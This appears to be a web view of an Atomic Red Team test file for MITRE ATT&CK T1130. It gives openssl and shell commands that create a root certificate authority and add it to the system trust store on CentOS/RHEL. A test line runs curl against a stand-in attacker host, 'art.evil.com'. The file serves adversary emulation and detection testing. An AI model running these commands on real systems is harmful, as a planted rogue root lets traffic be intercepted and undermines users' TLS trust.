security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5f848fe2c19d948c3ef18f2becedf335fdff3c8e
atomic-red-team/Linux/Defense_Evasion/Install_Root_Certificate.md
T

699 B
Raw Blame History

Install Root Certificate

MITRE ATT&CK Technique: T1130

Create a root CA with openssl

openssl genrsa -out rootCA.key 4096
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -out rootCA.crt

Install root CA on CentOS/RHEL 5 and below

cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt

Install root CA on CentOS/RHEL 6 and above

cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust

Testing the trusted certificate.

To test the new trust, apply the root certificate or another signed with it to a SSL/TLS web service and attempt a connection with curl or wget.

curl https://art.evil.com
Reference in New Issue View Git Blame Copy Permalink